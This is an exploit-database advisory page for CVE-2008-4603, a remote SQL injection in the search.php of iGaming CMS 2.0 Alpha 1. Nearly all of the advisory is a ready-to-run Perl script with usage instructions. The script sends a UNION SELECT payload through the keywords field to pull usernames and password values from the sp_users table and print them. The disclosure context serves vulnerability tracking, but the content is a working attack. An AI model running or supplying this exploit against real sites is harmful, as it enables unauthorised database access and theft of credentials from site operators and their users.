SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

iGaming CMS 2.0 Alpha 1 (search.php) Remote SQL Injection Exploit


Arrow  SecurityAlert : 4433
Arrow  CVE : CVE-2008-4603
Arrow  CWE : CWE-89
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Victim interaction required : No
Arrow  Exploit Available : Yes
  ExploitAlert :   4937
Arrow  Credit : StAkeR aka athos
Arrow  Published : 21.10.2008

Arrow  Affected Software : igaming:cms:2.0:alpha_1



Arrow  Advisory Content :  

#!/usr/bin/perl
# -----------------------------------------------------
# iGaming CMS 2.0 Alpha 1 Remote SQL Injection Exploit
# By StAkeR aka athos - StAkeR[at]hotmail[dot]it
# On 16/10/2008
# http://www.igamingcms.com/iGaming_2_Alpha.zip
# -----------------------------------------------------

use strict;
use LWP::UserAgent;


my ($host,$id) = @ARGV;

usage() unless $host =~ /http:\/\/(.+?)$/ and $id =~ /^[0-9]/;

my $etc = "' union select 1,concat(0x616E6172636879,".
"password,0x3a,username,0x616E6172636879),3".
",4,5 from sp_users where id=$id#";

my @search = ($etc,'all',0,'Search','search_games');
my @split = undef;

my $http = new LWP::UserAgent;
my $post = $http->post($host.'/search.php',
[
keywords => $search[0],
platform => $search[1],
exact => $search[2],
submit => $search[3],
do => $search[4]
]);

if($post->is_success)
{
if($post->as_string =~ /anarchy(.+?)anarchy/)
{
@split = split(':',$1);

print "Username: $split[0]\r\n";
print "Password: $split[1]\r\n";
}
else
{
print "Exploit Failed!\r\n";
}
}

sub usage
{
print "iGaming CMS 2.0 Alpha 1 Remote SQL Injection Exploit\r\n";
print "Usage: perl $0 http://[host] [user_id]\r\n";
exit;
}



__END__



Arrow  References :

http://securityreason.com/expldownload/1/4937/1 (Exploit)
http://www.securityfocus.com/bid/31793
http://www.milw0rm.com/exploits/6769




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.